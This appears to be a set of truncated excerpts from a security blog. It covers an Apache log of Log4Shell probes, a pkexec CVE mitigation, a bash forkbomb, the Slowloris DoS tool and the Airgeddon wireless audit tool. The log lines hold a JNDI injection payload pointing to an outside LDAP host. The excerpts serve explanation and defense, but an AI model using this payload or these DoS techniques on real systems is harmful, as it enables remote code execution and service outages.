[Fri Jan 28 03:42:04.636333 2022] [proxy:warn] [pid 30819] [client 98.0.242.10:46192] AH10188: Max-Forwards value '${jndi:ldap://X.X.X.X:1389/a}' could not be parsed, referer: ${jndi:ldap://X.X.X.X:1389/a}<br /> [Fri Jan 28 03:42:04.636394 2022] [proxy:error] [pid 30819] [client 98.0.242.10:46192] AH00898: Max-Forwards request...
The most actual systems have an update for this. If not you can close this vulnerability by executing:<br /> chmod 0755 /usr/bin/pkexec This will remove the SUID Bit from the File.<br /> More info here: https://nvd.nist.gov/vuln/detail/CVE-2021-4034 Image for the Thumbnail: ...
A forkbomb is a denial of service bash command that blocks the server, duo to high cpu load.<br /> The script is creating a recursive function and is infinitly launching itself - so the system will be blocked.<br /> <br /> Usefull for testing vHosts which are sharing ressources if high load is affecting other hosts.<br /> (T...
Slowloris is a Denial of Service attack tool that starts a lot of HTTP requests<br /> to take down its target. A weak server can be taken down with a single pc if you have<br /> enough CPU power and enough threads running. But thats not guaranteed.<br /> <br /> Has been tested and approved as working for small web servers wi...
Airgeddon is a multi use wireless audit tool.<br /> Its possible to pentest WEP and WPA2 Networks. Its included into a security parrot and KALI installation. The main features are Evil Twin Attacks/ Package Capturing and there is a Bruteforce Cracker included with aircrack-ng - but for better performance you should use something like hashcat ...